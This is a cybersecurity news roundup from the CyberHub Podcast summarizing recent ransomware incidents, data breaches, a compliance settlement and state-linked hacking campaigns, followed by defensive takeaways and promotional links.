Hey everyone—James Azar here, coming to you from Washington, D.C. The world of cybersecurity never sleeps, and neither do I—even when I’m on the road. In this edition, I’m tackling everything from disruptive ransomware attacks to sophisticated state-sponsored campaigns.

Buckle up, grab your coffee (or an energy drink you’re sneaking in), and let’s get into these critical stories you need to know.

Lee Enterprises Ransomware

With a national footprint spanning 75 newspapers, Lee Enterprises was rocked by a ransomware attack that not only encrypted key files but also led to data exfiltration. Investigations suggest the attackers gained access to extort payment in exchange for decryption. The incident caused significant delays in print distribution, billing, and online operations. While full scope details remain unclear, it underscores the vulnerability of large media organizations to disruptive cyberattacks.

Insight Partners Breach

New York-based venture capital and private equity giant Insight Partners, which oversees nearly USD 90 billion in assets, was hit by a breach following a well-orchestrated social engineering plot. Although the firm quickly contained the intrusion and insists on minimal fallout, specifics—like whether ransomware was involved—remain undisclosed. With massive financial transactions and confidential legal documents in the mix, PE and VC firms continue to be prime targets for sophisticated threat actors.

Finestra Notifications

FinTech heavyweight Finestra recently notified select customers after up to 400 GB of files were potentially stolen. Attackers exploited an internal file transfer application, raising concerns over exposed transaction records, account details, and personal information. While Finestra maintains that the breach was contained, experts warn the misuse of such data could have long-lasting impacts on financial institutions and end users alike.

Health Net Federal Services Settlement

Health Net Federal Services (HNFS) and parent company Centene agreed to pay USD 11 million to settle allegations of failing to meet cybersecurity requirements set by the Defense Health Agency. The alleged shortcomings—poor patching, outdated software, and inadequate vulnerability management—could have jeopardized TRICARE benefits for U.S. military families. The hefty settlement serves as a stern reminder that false claims of compliance will not go unpunished.

Share

Mustang Panda (Chinese APT)

Sometimes referred to as Earth Preta, the Mustang Panda group continues refining stealthy tactics, this time abusing Microsoft’s App-V Injector utility to execute malicious code under the radar. Spear-phishing emails loaded with decoy PDFs remain their go-to method, targeting governments, NGOs, and think tanks. By piggybacking on legitimate processes, Mustang Panda successfully bypasses antivirus defenses, posing both data theft and espionage risks.

Winnti Targeting Japan

Another China-linked APT, Winnti, has been zeroing in on Japanese manufacturing and energy firms. It exploits vulnerabilities in IBM Lotus Domino and ERP platforms to exfiltrate sensitive IP and proprietary data. Researchers note that Winnti collaborates with other Chinese threat actors, indicating a larger, coordinated effort to strengthen technological and commercial advantages.

Russian Actors Exploiting Signal

Russian-linked operatives are deploying cunning phishing techniques to link victims’ Signal accounts to attacker-controlled devices. Whether through deceptive QR codes or crafted device-linking prompts, the result is unauthorized access to end-to-end encrypted messages. This highlights how even robust platforms can be undermined when social engineering bypasses user caution.

Telegram Backdoor

A newly discovered Golang-based backdoor leverages Telegram channels for command and control. Despite being in the early stages of development, it’s already capable of remote code execution and data exfiltration. Telegram’s popularity as a secure communication tool ironically makes it appealing to cybercriminals looking to blend malicious traffic with legitimate user activity.

North Korea’s Kimsuky Campaign

North Korea’s Kimsuky group, also known as Thallium, has incorporated more covert “living off the land” approaches, employing PowerShell scripts, Dropbox storage, and benign file formats to conceal malicious operations. Nicknamed “Deep#Drive,” this campaign zeroes in on cryptocurrency theft to help finance the regime. Kimsuky’s agility underscores a persistent push to find novel revenue sources and conduct espionage.

Key Takeaways

• Fortify File Transfers: Encrypt and monitor all file transfer channels to spot abnormal data movement.

• Don’t Underestimate Phishing: Even state-sponsored actors rely heavily on human error. Train staff well and deploy advanced phishing defenses.

• Stay Compliant: Government or defense contractors face steep fines if found misrepresenting cybersecurity compliance.

• Lock Down Communications: Secure messaging apps (Signal, Telegram) can still be compromised by linking malicious devices.

• Continuous Vigilance: Nation-state groups evolve rapidly. Keep up through proactive intelligence, regular patching, and network monitoring.

That’s all for this edition of the CyberHub Podcast. Whether you’re bracing against ransomware or thwarting nation-state espionage, there’s always plenty to monitor in the cybersecurity realm. Thanks for reading, and remember—staying cyber safe is a collective effort. Until next time, I’m James Azar signing off from D.C.!

✅ Story Links:

https://www.securityweek.com/lee-enterprises-newspaper-disruptions-caused-by-ransomware/

https://www.bleepingcomputer.com/news/security/venture-capital-giant-insight-partners-hit-by-cyberattack/

https://www.securityweek.com/finastra-starts-notifying-people-impacted-by-recent-data-breach/

https://thecyberexpress.com/hnfs-settles-cybersecurity-case/

https://www.bleepingcomputer.com/news/security/chinese-hackers-abuse-microsoft-app-v-tool-to-evade-antivirus/

https://www.darkreading.com/cyberattacks-data-breaches/china-linked-threat-group-japanese-orgs-servers

https://www.bleepingcomputer.com/news/security/russian-phishing-campaigns-exploit-signals-device-linking-feature/

https://www.securityweek.com/golang-backdoor-abuses-telegram-for-cc-communication/

https://www.darkreading.com/cyberattacks-data-breaches/north-koreans-kimsuky-attacks-rivals-trusted-platforms

🔔 Subscribe now for the latest insights from industry leaders, in-depth analyses, and real-world strategies to secure your digital world. https://www.youtube.com/@TheCyberHubPodcast/?sub_confirmation=1

🚨 Important Links to Follow:

👉Website:

CISO Talk by James Azar

The latest news and topics from a cybersecurity practitioners discussing Cybersecurity, Privacy, Technology & Geo-Politics. I am a two times Founder and Chief Information Security Officer. All opinions are my own

👉Listen here: https://linktr.ee/cyberhubpodcast

✅ Stay Connected With Us.

👉Facebook: https://www.facebook.com/CyberHubpodcast/

👉LinkedIn: https://www.linkedin.com/company/cyberhubpodcast/

👉Twitter (X): https://twitter.com/cyberhubpodcast

👉Instagram: https://www.instagram.com/cyberhubpodcast

🤝 For Business Inquiries: info@cyberhubpodcast.com

=============================

🚀 About The CyberHub Podcast.

The Hub of the Infosec Community.

Our mission is to provide substantive and quality content that’s more than headlines or sales pitches. We want to be a valuable source to assist those cybersecurity practitioners in their mission to keep their organizations secure.

Tune in to our podcast Monday through Thursday at 9AM EST for the latest news.